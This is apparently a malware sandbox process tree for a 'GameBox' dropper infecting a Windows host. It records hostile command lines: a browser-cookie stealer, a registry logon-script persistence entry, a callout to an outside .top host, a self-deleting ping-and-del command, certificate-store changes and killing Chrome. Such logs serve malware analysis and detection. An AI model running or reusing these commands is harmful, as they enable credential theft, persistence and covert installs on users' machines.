                                                                  4⤵
                                                                    PID:4912
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:4496
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    4⤵
                                                                      PID:5172
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      4⤵
                                                                        PID:5764
                                                                  • C:\Users\Admin\Documents\kwGSF3Qi0ni4OeOWionELEvq.exe
                                                                    "C:\Users\Admin\Documents\kwGSF3Qi0ni4OeOWionELEvq.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4252
                                                                  • C:\Users\Admin\Documents\gYb3aN6fVy8QzItL0lxGL9Pl.exe
                                                                    "C:\Users\Admin\Documents\gYb3aN6fVy8QzItL0lxGL9Pl.exe"
                                                                    2⤵
                                                                      PID:4240
                                                                    • C:\Users\Admin\Documents\ZkPc4oWojcZSdbYi947IJcfe.exe
                                                                      "C:\Users\Admin\Documents\ZkPc4oWojcZSdbYi947IJcfe.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3648
                                                                    • C:\Users\Admin\Documents\Fo7JeR3UjMGMXtbhFtHzWCrz.exe
                                                                      "C:\Users\Admin\Documents\Fo7JeR3UjMGMXtbhFtHzWCrz.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:4940
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-QGMNE.tmp\Fo7JeR3UjMGMXtbhFtHzWCrz.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-QGMNE.tmp\Fo7JeR3UjMGMXtbhFtHzWCrz.tmp" /SL5="$60046,138429,56832,C:\Users\Admin\Documents\Fo7JeR3UjMGMXtbhFtHzWCrz.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:804
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-2DCIC.tmp\Setup.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-2DCIC.tmp\Setup.exe" /Verysilent
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:2128
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:4204
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 828
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:4656
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1060
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:7052
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1036
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:4872
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1060
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:7464
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1148
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:5284
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 1168
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:4320
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:2936
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-7P4FQ.tmp\Inlog.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-7P4FQ.tmp\Inlog.tmp" /SL5="$202B8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:5244
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-R08D1.tmp\Setup.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-R08D1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                7⤵
                                                                                  PID:7680
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RTRIJ.tmp\Setup.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RTRIJ.tmp\Setup.tmp" /SL5="$20438,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-R08D1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                    8⤵
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:7756
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-JBOSK.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                      9⤵
                                                                                        PID:6764
                                                                                        • C:\Windows\SysWOW64\expand.exe
                                                                                          expand C:\Users\Admin\AppData\Local\Temp\is-JBOSK.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                          10⤵
                                                                                            PID:4736
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                          9⤵
                                                                                            PID:9180
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                              10⤵
                                                                                                PID:7472
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                              9⤵
                                                                                              • Checks computer location settings
                                                                                              • Drops file in System32 directory
                                                                                              • Drops file in Windows directory
                                                                                              • Checks SCSI registry key(s)
                                                                                              PID:8916
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                10⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Program Files directory
                                                                                                PID:5196
                                                                                            • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                              "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                              9⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:356
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-JBOSK.tmp\{app}\vdi_compiler.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-JBOSK.tmp\{app}\vdi_compiler"
                                                                                              9⤵
                                                                                                PID:7444
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-JBOSK.tmp\{app}\vdi_compiler.exe"
                                                                                                  10⤵
                                                                                                    PID:8488
                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                      ping localhost -n 4
                                                                                                      11⤵
                                                                                                      • Runs ping.exe
                                                                                                      PID:8856
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Enumerates connected drives
                                                                                          • Modifies system certificate store
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:4132
                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289457 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                            6⤵
                                                                                              PID:9212
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5140
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-R81CP.tmp\WEATHER Manager.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-R81CP.tmp\WEATHER Manager.tmp" /SL5="$1030E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:5404
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-H71IM.tmp\Setup.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-H71IM.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                7⤵
                                                                                                • Loads dropped DLL
                                                                                                • Enumerates connected drives
                                                                                                • Modifies system certificate store
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:6448
                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-H71IM.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-H71IM.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289457 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                  8⤵
                                                                                                    PID:8608
                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                              5⤵
                                                                                                PID:5196
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5296
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-CBQP7.tmp\MediaBurner2.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-CBQP7.tmp\MediaBurner2.tmp" /SL5="$10324,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:5544
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-8B7OM.tmp\3377047_logo_media.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-8B7OM.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                    7⤵
                                                                                                    • Drops file in Drivers directory
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:4480
                                                                                                    • C:\Program Files\Windows Mail\BPLXMZUGGL\ultramediaburner.exe
                                                                                                      "C:\Program Files\Windows Mail\BPLXMZUGGL\ultramediaburner.exe" /VERYSILENT
                                                                                                      8⤵
                                                                                                        PID:7000
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-EBQNO.tmp\ultramediaburner.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-EBQNO.tmp\ultramediaburner.tmp" /SL5="$3044A,281924,62464,C:\Program Files\Windows Mail\BPLXMZUGGL\ultramediaburner.exe" /VERYSILENT
                                                                                                          9⤵
                                                                                                          • Drops file in Program Files directory
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          PID:5668
                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                            10⤵
                                                                                                              PID:5052
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\e6-06666-5e4-fca9b-c1c4715aa4355\Laxihimavi.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\e6-06666-5e4-fca9b-c1c4715aa4355\Laxihimavi.exe"
                                                                                                          8⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:7320
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\89-9a44a-bfb-d318f-10d7a6acbd7af\Taxasimaece.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\89-9a44a-bfb-d318f-10d7a6acbd7af\Taxasimaece.exe"
                                                                                                          8⤵
                                                                                                            PID:4424
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oadazeub.3ga\GcleanerEU.exe /eufive & exit
                                                                                                              9⤵
                                                                                                                PID:7816
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  10⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5252
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\oadazeub.3ga\GcleanerEU.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\oadazeub.3ga\GcleanerEU.exe /eufive
                                                                                                                  10⤵
                                                                                                                    PID:6440
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ofuolal.3xg\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                  9⤵
                                                                                                                    PID:8236
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3ofuolal.3xg\installer.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\3ofuolal.3xg\installer.exe /qn CAMPAIGN="654"
                                                                                                                      10⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Enumerates connected drives
                                                                                                                      • Modifies system certificate store
                                                                                                                      PID:8520
                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3ofuolal.3xg\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\3ofuolal.3xg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289457 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                        11⤵
                                                                                                                          PID:4676
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ac2mgwc.sox\ufgaa.exe & exit
                                                                                                                      9⤵
                                                                                                                        PID:8620
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0klotwax.ibd\anyname.exe & exit
                                                                                                                        9⤵
                                                                                                                          PID:8448
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\0klotwax.ibd\anyname.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\0klotwax.ibd\anyname.exe
                                                                                                                            10⤵
                                                                                                                              PID:6436
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0klotwax.ibd\anyname.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\0klotwax.ibd\anyname.exe" -q
                                                                                                                                11⤵
                                                                                                                                  PID:2900
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\grppzskb.ekj\gcleaner.exe /mixfive & exit
                                                                                                                              9⤵
                                                                                                                              • Blocklisted process makes network request
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:5536
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\grppzskb.ekj\gcleaner.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\grppzskb.ekj\gcleaner.exe /mixfive
                                                                                                                                10⤵
                                                                                                                                  PID:9148
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mjabjlyy.ypz\autosubplayer.exe /S & exit
                                                                                                                                9⤵
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:2548
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                        5⤵
                                                                                                                          PID:5232
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                            6⤵
                                                                                                                              PID:6920
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                7⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:7296
                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5168
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-3S271.tmp\VPN.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-3S271.tmp\VPN.tmp" /SL5="$10316,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:5412
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-RS4D8.tmp\Setup.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-RS4D8.tmp\Setup.exe" /silent /subid=720
                                                                                                                                7⤵
                                                                                                                                  PID:7004
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-C2UU9.tmp\Setup.tmp
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-C2UU9.tmp\Setup.tmp" /SL5="$203C6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-RS4D8.tmp\Setup.exe" /silent /subid=720
                                                                                                                                    8⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:4068
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                      9⤵
                                                                                                                                        PID:6676
                                                                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                          tapinstall.exe remove tap0901
                                                                                                                                          10⤵
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          PID:8824
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                        9⤵
                                                                                                                                          PID:8108
                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                            tapinstall.exe install OemVista.inf tap0901
                                                                                                                                            10⤵
                                                                                                                                              PID:8916
                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                            9⤵
                                                                                                                                              PID:6704
                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                              9⤵
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:2312
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5388
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5276
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                      5⤵
                                                                                                                                        PID:5340
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8622355.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8622355.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:6076
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2463390.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2463390.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                          PID:3780
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4164647.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4164647.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:344
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6144835.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6144835.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:904
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5444
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpE367_tmp.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\tmpE367_tmp.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:6608
                                                                                                                                          • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                            "C:\Windows\System32\dllhost.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:5336
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                              7⤵
                                                                                                                                                PID:8000
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd
                                                                                                                                                  8⤵
                                                                                                                                                    PID:4548
                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                      findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                      9⤵
                                                                                                                                                        PID:2916
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        Esplorarne.exe.com i
                                                                                                                                                        9⤵
                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:7044
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                          10⤵
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:6100
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            11⤵
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:5268
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              12⤵
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:7300
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                13⤵
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:8728
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  14⤵
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:9124
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    15⤵
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:5476
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      16⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:8624
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        17⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:9208
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          18⤵
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:7840
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            19⤵
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:8412
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              20⤵
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:6680
